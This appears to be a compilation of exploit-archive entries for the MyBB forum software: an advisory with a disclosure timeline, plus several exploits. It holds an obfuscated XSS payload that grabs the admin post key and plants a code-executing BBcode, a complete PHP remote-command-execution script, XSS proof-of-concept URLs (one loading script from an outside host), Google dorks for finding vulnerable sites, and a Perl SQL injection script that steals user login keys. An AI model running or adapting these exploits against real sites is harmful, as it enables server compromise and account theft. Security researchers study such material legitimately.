http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.victim.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.victim.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27)%2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))//
All that is required is an active admin session for cookie stealing and
Remote Code Execution.
This adds the BBcode evil and can be used as follows:
evilphpinfo()evil
Note: The %20 padding is necessary and must be custom-tailored to the
victim due to how
MyBB handles posting, if using the posting form. However, CSRF can be
used instead of posting
directly to the site.
Issue 2: "Guessing" of attachment filenames
On certain server setups running MyBB, it is possible to guess the filename
of an uploaded file. The code in question is this:
$filename = "post_".$mybb->user['uid']."_".time().".attach";
This creates a filename of the following: post_1234_[unix timestamp].attach.
This makes it very easy to guess the filename and bypass any sort of MIME-
sniffing protection. It also means privilege escalation, as attachments can
be read regardless of the user's permissions. It is not even hard to guess the
filename without knowing the post time - just a few million attempts due to the
weak randomization used.
Issue 3: Incomplete protection against MIME-sniffing.
MyBB fails to properly deliver uploaded files in a way that avoids
MIME-sniffing by the Internet Explorer family of browsers. This can
be exploited to upload files that will be interpreted as HTML by
Internet Explorer. As this vulnerability is present in many applications,
we will not provide a PoC.
None of the reported issues were fixed in the 1.4.2 release or since.
=======================================================================
History
August 18 2008: Vendor contacted
September 02 2008: Vendor contacted again, due to no response
September 03 2008: Vendor announced full source audit to be performed
by Gulftech
September 17 2008: Patch released, vulnerabilities incorrectly
credited to Gulftech, two out of three vulnerabilities left
exploitable, with the XSS and the MIME-sniffing
September 17 2008: After learning about the release from sources other
than the vendor, FD
September 23/24 2008: Emailed again in an attempt to ensure MyBB
understood the severity of the MIME-sniffing vulnerability and
alerting them to the XSS
October 05/06 2008: MyBB replied that the XSS was a non-issue
October 27 2008: Release after MyBB has failed to release a fix after
numerous attempts to explain the severity of the vulnerabilities,
Issue 2 was previously unreported
=======================================================================
=======================================================================
Solution
For users: Per usual, update as soon as a patch becomes available.
For MyBB: Give credit to researchers where due.
=======================================================================
Fun quote for the day (and mention of a really good book):
"What we found was startling: Security and coding flaws were so
prevalent that an attack might be delayed because the attacker might
get stuck trying to choose from all the different vulnerabilities to
exploit without knowing where to turn first. (Such delay tactics are
not recommended as a security strategy.)" - Aviel D. Rubin, Exploiting
Software: How to Break Code, Foreword
MyBB version 1.4.2 suffers from cross site scripting and remote code execution vulnerabilities.
Silentz/mybb1210-exec.txt ( na)
#!/usr/bin/php -q -d short_open_tag=on
<?php
// magic_quotes_gpc needs to be off
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
if ($argc<5) {
print "-------------------------------------------------------------------------\r\n";
print " MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: w4ck1ng_mybb.php [HOST] [PATH] [FORUM_ID] [COMMAND]\r\n\r\n";
print "[HOST] = Target server's hostname or ip address\r\n";
print "[PATH] = Path where MyBB is located\r\n";
print "[FORUM_ID] = Valid forum ID\r\n";
print "[COMMAND] = Command to execute\r\n\r\n";
print "e.g. w4ck1ng_mybb.php victim.com /mybb/ 1 id\r\n";
print "-------------------------------------------------------------------------\r\n";
print " http://www.w4ck1ng.com\r\n";
print " ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
die;
}
//Props to rgod for the following functions
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host = $argv[1];
$path = $argv[2];
$fid = $argv[3];
$cmd = $argv[4];
$cmd = urlencode($cmd);
$port=80;$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
$packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("*",$html);
$temp2=explode("*",$temp[1]);
print "-------------------------------------------------------------------------\r\n";
print " MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
echo $temp2[0];
print "-------------------------------------------------------------------------\r\n";
print " http://www.w4ck1ng.com\r\n";
print " ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
?>
MyBulletinBoard aka MyBB versions 1.2.10 and below remote code execution exploit.
Darksnipper/MyBB Games Cross Site Scripting ( na)
################################################################ # # Exploit Title :Mybb Games xss Vul # # Author : DarkSnipper ,Dream.Killer & Soul~inj3ctor # # Discovered By : Darksnipper@live.com # Home : http://cybercoders.org # #Link : http://mods.mybb.com/view/game-section # # Security Risk : High # # Version : All # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : intext:"Powered By mybb" # ###################################################################### # # Expl0iT :http://www.site.com/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E or http://www.site.com/scriptlocation/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E # Demo:http://www.cyberhut.in/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+snipper%27%29%3C%2Fscript%3E #Greetz:Error Haxor,Dream.killer,Soul~Inj3ctor,Dr.v!ru$,Shadow008,H4x0rl1f3,X3o-1337,Force-ex,Retn0Hack,P4k-comm4nder,1337,Madcode,Anons Dexter,Sen Haxor,Dr.z0mbie,Trick,Pak Cyber Army,Madleets,Z Company Hacking Crew,Badwares Team,Kashmir Cyber Army, Anonymous Pakistan,3xp1r3 Cyber Army And All Muslim Hackers. ################################
MyBB Games suffers from a cross site scripting vulnerability.
TEAMELITE/MyBB Cross Site Scripting ( na)
MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML
Injection
http://www.mybb.com
12-12-2010
Poc: http://infectionsupport.com/tags.php?tag=
"><script>alert(String.fromCharCode(88,83,83))</script>
http://infectionsupport.com/tags.php?tag="><script src%3d//ckers.org/s
></script>
Google dork: powered by mybb inurl:tags.php?tag=
by Teamelite (Methodman) http://nemesis.te-home.net
MyBB suffers from a cross site scripting vulnerability in tags.php.
D3vil-0x1/MyBB104SQL.txt ( na)
#!/usr/bin/perl -w
# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
#
# Milw0rm ID :-
# http://www.milw0rm.com/auth.php?id=1539
# D3vil-0x1 | Devil-00 < BlackHat > :)
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;
##-- Start --#
$host = "127.0.0.1";
$path = "/mybb3/";
$userid = 1;
$mycookie = "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";
##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
#
# $path :-
# MyBB Dir On Server | exm. /mybb/
#
# $userid :-
# The ID Of The User U Wanna To Get His Loginkey
#
# $cookie :-
# You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
#
# $cookie = "mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or die("[!] Connect To Server Was Filed");
##-- DONT TRY TO EDIT ME --##
$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
##-- DONT TRY TO EDIT ME --##
$evildata = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n";
$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";
print $sock $evildata;
while($ans = <$sock>){
$ans =~ m/<a href=\"member.php\?action=profile&uid=1\" target=\"_blank\">(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
}
MyBB versions 1.04 and below remote SQL injection exploit using misc.php.